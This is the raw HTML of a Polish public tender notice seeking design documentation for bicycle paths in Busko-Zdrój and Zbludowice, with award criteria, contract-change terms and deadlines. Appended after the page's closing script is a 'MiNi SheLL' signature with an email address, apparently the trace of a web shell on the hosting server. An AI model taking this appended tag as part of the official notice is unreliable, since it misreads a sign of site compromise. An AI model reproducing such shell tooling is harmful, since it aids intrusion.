ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena brutto</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryterium wyboru oferty najkorzystniejszej wykonywanych robót na podstawie opracowanej dokumentacji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający dopuszcza zmianę zawartej umowy w następujących okolicznościach;1.	Zmiana personelu Wykonawcy w szczególności osób posiadających wymagane uprawnienia w przypadku śmierci, choroby lub długotrwałej niezdolności do pracy, rozwiązania umowy o pracę/zlecenie ze stroną umowy, niemożliwości wykonywania przyjętej funkcji w innych uzasadnionych przypadkach.2.	Ponadto umowa będzie mogła ulec zmianie w przypadku:a) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi, warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy,b) gdy zaistnieje inna niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze SIWZ.3. Pozostałe okoliczności dokonania zmian w umowie:a)	zmiana obowiązującej stawki VAT,Zmiany mogą być dokonywane na pisemny wniosek stron umowy wraz z uzasadnieniem, w formie sporządzonego na piśmie aneksu.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-07-25</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Zadanie nr 1 - Opracowanie projektu budowy ścieżki rowerowej/ciągu pieszo-rowerowego w ulicy Starkiewicza, 1-ego Maja, Rehabilitacyjnej w Busku-Zdroju i w ul. Strażackiej w Zbludowicach.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamówienie obejmuje opracowanie dokumentacji projektowej budowlano-wykonawczej. Zadanie Nr 1: budowa ścieżki rowerowej/ciągu pieszo-rowerowego w ulicy Starkiewicza, 1-ego Maja, Rehabilitacyjnej w Busku-Zdroju i w ul. Strażackiej w Zbludowicach. Szacowana długość ścieżek do zaprojektowania wynosi 2,5 km w tym łączna długość odcinków ścieżki, na które ma zostać opracowana dokumentacja projektowa celem uzyskania decyzji:- o zezwoleniu na realizację inwestycji drogowej wynosi ok. 0,6 km ,- o pozwoleniu na budowę/zgłoszeniu robót budowlanych wynosi ok. 1,9 km. Powyższe dane mają charakter orientacyjny i podczas prac projektowych mogą ulec zmianie.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71220000-6, 71221000-3, 71322000-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Kryterium wyboru oferty najkorzystniejszej wykonywanych robót na podstawie opracowanej dokumentacji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Zadanie nr 2 - Opracowanie projektu budowy ścieżki rowerowej/ciągu pieszo-rowerowego w ulicach: Rokosza, przedłużenie ulicy Rokosza, Waryńskiego (na odcinku od ulicy Młyńskiej do DW 973 oraz na odcinku od ul. Lipowej do ul. Mickiewicza), Kusocińskiego i Lipowej w Busku Zdroju. </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zamówienie obejmuje opracowanie dokumentacji projektowej budowlano-wykonawczej. Zadanie Nr 2: budowa ścieżki rowerowej/ciągu pieszo-rowerowego w ulicach: Rokosza, przedłużenie ulicy Rokosza, Waryńskiego ( na odcinku od ulicy Młyńskiej do DW 973 oraz na odcinku od ul. Lipowej do ul. Mickiewicza), Kusocińskiego i Lipowej w Busku-Zdroju. Szacowana długość ścieżek do zaprojektowania wynosi 3,6 km w tym łączna długość odcinków ścieżki, na które ma zostać opracowana dokumentacja projektowa celem uzyskania decyzji:- o zezwoleniu na realizację inwestycji drogowej wynosi ok. 1,2 km ,- o pozwoleniu na budowę/zgłoszeniu robót budowlanych wynosi ok. 2,4 km. Powyższe dane mają charakter orientacyjny i podczas prac projektowych mogą ulec zmianie. <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>71220000-6, 71221000-3, 71322000-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena brutto</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Kryterium wyboru oferty najkorzystniejszej wykonywanych robót na podstawie opracowanej dokumentacji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com